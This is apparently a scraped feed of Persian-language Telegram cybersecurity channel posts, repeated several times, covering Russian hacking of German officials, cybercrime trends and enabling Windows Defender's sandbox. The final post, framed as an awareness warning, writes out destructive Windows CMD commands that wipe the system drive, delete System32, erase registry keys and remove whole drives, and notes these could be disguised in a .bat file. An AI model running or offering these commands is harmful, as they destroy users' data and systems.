🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Forwarded from IACS (Pedram Kiani)
شکل 2: منابع اصلی تهدیدهای مسدود شده در رایانه های ICS (درصد رایانه های مورد حمله طی دوره های نیم سال) (منبع: آزمایشگاه کسپرسکی)
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
هک ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان
آژانس امنیت داخلی آلمان اعلام کرده است که ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان، هدف حمله هکرهای روسی قرار گرفته است. در ماه اکتبر نیز مقامات آلمانی اعلام کردند که حمله سایبری 2017 به وزارت خارجه آلمان توسط هکرهای روسی انجام گرفته است. اشپیگل نیز اعلام کرد که مقامات مبارزه با حملات سایبری آلمان اعلام کردند که حملات جدیدی علیه برخی دستگاههای این کشور انجام شده است که اکثر این حملات در چهاردهم نوامبر انجام گرفته ولی هنوز مشخص نیست که چه اطلاعاتی براساس این حملات مورد هدف بوده است. با این حال سخنگوی کرملین اعلام کرد که روسیه هیچگونه دخالتی در امور کشورهای دیگر ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
آژانس امنیت داخلی آلمان اعلام کرده است که ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان، هدف حمله هکرهای روسی قرار گرفته است. در ماه اکتبر نیز مقامات آلمانی اعلام کردند که حمله سایبری 2017 به وزارت خارجه آلمان توسط هکرهای روسی انجام گرفته است. اشپیگل نیز اعلام کرد که مقامات مبارزه با حملات سایبری آلمان اعلام کردند که حملات جدیدی علیه برخی دستگاههای این کشور انجام شده است که اکثر این حملات در چهاردهم نوامبر انجام گرفته ولی هنوز مشخص نیست که چه اطلاعاتی براساس این حملات مورد هدف بوده است. با این حال سخنگوی کرملین اعلام کرد که روسیه هیچگونه دخالتی در امور کشورهای دیگر ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
رشد حملات پردازش رایانهها و سرقت دادهها
اقدامات متقلبانه مربوط به جرائم سوءاستفاده از رایانه، در طول یک دوره چهار درصد افزایش داشته که این امر به علت افزایش ۴۲ درصدی در مورد هک، رسانههای اجتماعی و ایمیل است. مدیر امنیت سایبری در شرکت Redscan، گفته که بعضی از یافتهها را جدی نگیرید. ما نمیتوانیم این واقعیت را نادیده بگیریم که به دلایل متعددی، بسیاری از جنایات دیجیتال گزارششده است. در بسیاری از موارد، شناسایی فعالیتهای جنایی مانند فیشینگ دشوار است و اکثراً مردم بیاطلاع از قربانی شدن هستند و توضیح میدهد که حملاتی که مجرمان توانایی پردازش رایانهها را داشته و دادهها را برای برداشتن ارز دیجیتال به سرقت میبرند، همچنان بهطور فزایندهای در حال افزایش است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
اقدامات متقلبانه مربوط به جرائم سوءاستفاده از رایانه، در طول یک دوره چهار درصد افزایش داشته که این امر به علت افزایش ۴۲ درصدی در مورد هک، رسانههای اجتماعی و ایمیل است. مدیر امنیت سایبری در شرکت Redscan، گفته که بعضی از یافتهها را جدی نگیرید. ما نمیتوانیم این واقعیت را نادیده بگیریم که به دلایل متعددی، بسیاری از جنایات دیجیتال گزارششده است. در بسیاری از موارد، شناسایی فعالیتهای جنایی مانند فیشینگ دشوار است و اکثراً مردم بیاطلاع از قربانی شدن هستند و توضیح میدهد که حملاتی که مجرمان توانایی پردازش رایانهها را داشته و دادهها را برای برداشتن ارز دیجیتال به سرقت میبرند، همچنان بهطور فزایندهای در حال افزایش است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
بخشهای حساس در حوزه امنیت سایبری
بخشهای حساس در حوزه امنیت سایبری عبارتند از: مهاجمانی که فروشندگان سطح پایین زنجیره تامین را هدف قرار می دهند: مهاجمان سایبری الگوی حملات خود را تغییر داده اند. آن ها از اشخاص ثالث و رابع، برای ورود به سیستم های هدف استفاده می کنند. مجرمان سایبری، جاسوس ها و گروه های هکری همچنان به هدف قرار دادن فعالان زنجیره تامین، با هدف رسیدن به اهداف مالی و سیاسی خود، ادامه می دهند. حمله به زیرساخت های حیاتی: صنعت نفت و گاز، همچنان برای هکرها، یکی از اهداف بسیار محبوب به شمار می رود. حملات سایبری می توانند تاثیر قابل توجهی بر امنیت و اقتصاد تولید کنندگان و تامین کنندگان بخش انرژی داشته باشد. انگیزه های مالی حملات سایبری در حال افزایش هستند: گروه های هکری معروفی چون FIN7 و Cobalt Group، حملات سایبری خود را علیه موسسات مالی بزرگ و رستوران های زنجیره ای، افزایش داده اند. این گروه ها با به روزرسانی بدافزارهای خود، تهدیدی بزرگ به شمار می روند. رشد بدافزارها در قالب ابزار استخراج ارزهای دیجیتال: با توجه به افزایش اقبال جهانی به استخراج ارزهای رمزپایه، انتظار می رود که استفاده هکرها از تروجان های استخراج ارزهای دیجیتال نیز رشد قابل توجهی داشته باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
بخشهای حساس در حوزه امنیت سایبری عبارتند از: مهاجمانی که فروشندگان سطح پایین زنجیره تامین را هدف قرار می دهند: مهاجمان سایبری الگوی حملات خود را تغییر داده اند. آن ها از اشخاص ثالث و رابع، برای ورود به سیستم های هدف استفاده می کنند. مجرمان سایبری، جاسوس ها و گروه های هکری همچنان به هدف قرار دادن فعالان زنجیره تامین، با هدف رسیدن به اهداف مالی و سیاسی خود، ادامه می دهند. حمله به زیرساخت های حیاتی: صنعت نفت و گاز، همچنان برای هکرها، یکی از اهداف بسیار محبوب به شمار می رود. حملات سایبری می توانند تاثیر قابل توجهی بر امنیت و اقتصاد تولید کنندگان و تامین کنندگان بخش انرژی داشته باشد. انگیزه های مالی حملات سایبری در حال افزایش هستند: گروه های هکری معروفی چون FIN7 و Cobalt Group، حملات سایبری خود را علیه موسسات مالی بزرگ و رستوران های زنجیره ای، افزایش داده اند. این گروه ها با به روزرسانی بدافزارهای خود، تهدیدی بزرگ به شمار می روند. رشد بدافزارها در قالب ابزار استخراج ارزهای دیجیتال: با توجه به افزایش اقبال جهانی به استخراج ارزهای رمزپایه، انتظار می رود که استفاده هکرها از تروجان های استخراج ارزهای دیجیتال نیز رشد قابل توجهی داشته باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
افزودن حالت سندباکس به آنتیویروس ویندوز یا همان Windows Defender
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Microsoft Security Blog
Windows Defender Antivirus can now run in a sandbox | Microsoft Security Blog
Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox.
🚨هشدار‼️‼️‼️
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
-> حذف فایل مهم سیستمی "System32"
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00
-> حذف فایل مهم سیستمی "System32"
c:\WINDOWS\SYSTEM32\*.*/q
-> حذف تمامی ریجستری ها !OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
-> فرمت درایو ها (خودتون میتونید تغییرشون دهید)D:\
rd/s/q C:\
rd/s/q E:\👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است